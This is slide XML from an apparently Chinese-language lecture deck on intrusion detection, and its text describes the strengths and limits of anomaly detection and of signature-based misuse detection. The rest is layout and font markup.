                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{318BAE8B-7979-5046-D7C0-3EBEECAAA67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9" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97561D01-6398-F491-F8E7-E992A291ACE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80" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B6426F-5403-17CA-41CA-76C8A032EEDD}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="组合 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F044AD64-A55D-E9A7-8AF1-C465A6411489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6451826" y="3541931"/>
            <a:ext cx="2214245" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="3487" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4866F277-ABA2-46D3-4283-97A05DE81271}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="254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误报率高</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="83" name="组合 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A836A16-2359-6CAE-263F-BFB339D3C279}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="84" name="图片 83">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{908244A5-62DE-67B1-E5D4-4C4A5C21D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5" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A80E31E-1C00-1E72-A513-1C67A33D78D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86" name="组合 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71875018-8FD3-8425-D910-1884CB93FCC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6451826" y="4057424"/>
            <a:ext cx="3283585" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="5171" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3F4E0F-D93E-0894-8D83-C7BC298D3CF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="422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行为模型建立困难</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="88" name="组合 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735D238C-3958-585F-E9AB-5404383FB130}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="89" name="图片 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8431303-A8AF-AAB5-57C6-A754816E8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0" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79582A1-2EAE-C531-FD1E-9ECFA3657A2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91" name="组合 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE738F0-3D94-9732-9136-C311186C1658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6462106" y="4537399"/>
            <a:ext cx="3891280" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6128" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2F15D4-A963-9578-2F41-C68E629308B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="5183"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难以对入侵行为分类和命名</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="93" name="组合 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C0BAEA-B71B-AF30-2F84-8F8F7DB8808B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="94" name="图片 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726C6FC2-77B3-44FC-D11C-99B89F489C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09" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C189B490-B90A-6B29-6215-D03E11B16EF7}"/>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111" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3357EED-1B27-7C55-F333-BF0C54E63D15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1609958" y="4720517"/>
            <a:ext cx="4319977" cy="4263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000" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>内部合法用户的越权行为检测能力强</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="2000" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="组合 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91C57AB-9145-F7CA-4ABD-6BF98500F0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="963228" y="4543168"/>
            <a:ext cx="858689" cy="830580"/>
            <a:chOff x="8632" y="3854"/>
            <a:chExt cx="1508" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="113" name="图片 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D75D10-F4C7-2E7C-5EA2-D9DA9CFD6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14" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4D4BC5-0F7B-6B29-F4D4-8AA4EF55192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4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sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD2D568-E760-99C0-DC19-D013A406DE9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3536527" y="1449969"/>
            <a:ext cx="46939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异常检测技术的评价：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="图片 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCE542C-7937-6F22-E829-505B9B33B23E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1575334" y="1230009"/>
            <a:ext cx="1800488" cy="1060442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形: 剪去左右顶角 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D0BF3A-5342-5575-95CC-DE67F421776F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077788" y="2339963"/>
            <a:ext cx="4946208" cy="3307494"/>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6" name="矩形: 剪去左右顶角 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3319F8D5-A068-E81C-97D9-810EEDCF2613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6579882" y="2303474"/>
            <a:ext cx="4206118" cy="3307494"/>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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FAB422B-1925-4359-97C9-7DE76438ACDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497928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867767"/>
            <a:ext cx="1239837" cy="1555656"/>
            <a:chOff x="3792538" y="2928938"/>
            <a:chExt cx="1239837" cy="1555656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="AutoShape 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="2928938"/>
              <a:ext cx="1239837" cy="1555656"/>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92550" y="3021013"/>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340092"/>
              <a:ext cx="11096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误用</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743392" y="2526012"/>
            <a:ext cx="8242935" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="12981" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="117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将系统当前行为状态与已知入侵特征进行比较</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56" name="组合 55"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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0"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1" name="组合 60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2745173" y="1869034"/>
            <a:ext cx="4292600" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="6760" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="552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基于知识的入侵检测</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="63" name="组合 62"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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5"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sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7740015" y="4027170"/>
            <a:ext cx="3367405" cy="7962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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>能检测</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未知</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7739380" y="4751070"/>
            <a:ext cx="3517900" cy="7962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准确检测已知入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="934720" y="3808730"/>
            <a:ext cx="6449060" cy="2117090"/>
            <a:chOff x="1472" y="5998"/>
            <a:chExt cx="10156" cy="3334"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:clrChange>
                <a:clrFrom>
                  <a:srgbClr val="FFFFFF"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:clrTo>
              </a:clrChange>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1472" y="5998"/>
              <a:ext cx="10157" cy="3335"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5654" y="6151"/>
              <a:ext cx="2016" cy="434"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40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1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>异常行为描述库</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8E0568B-9A8A-46AF-BCB3-BE067A07DC59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>误用检测</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1716031"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假设前提</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3100547" y="2477285"/>
            <a:ext cx="746061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检测用户或系统行为是否和特征库中记录匹配</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3060000" y="1260000"/>
            <a:ext cx="6463665"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入侵行为都有可被检测到的特征</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77B0C70C-146C-6F85-F95C-19683F044BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="2481514"/>
            <a:ext cx="1748503" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424F54AD-4FCB-2F2B-D906-3B00675B860E}"/>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6" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD62BB9F-9254-D6A6-55D3-08A06F8253EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3840958"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8" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD5841E-2F12-9F31-06F6-4A6FEE70FEFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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入侵特征</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED48CE4-38DF-621A-C1E6-C7E3AC0DC049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="4220729"/>
            <a:ext cx="1716031" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
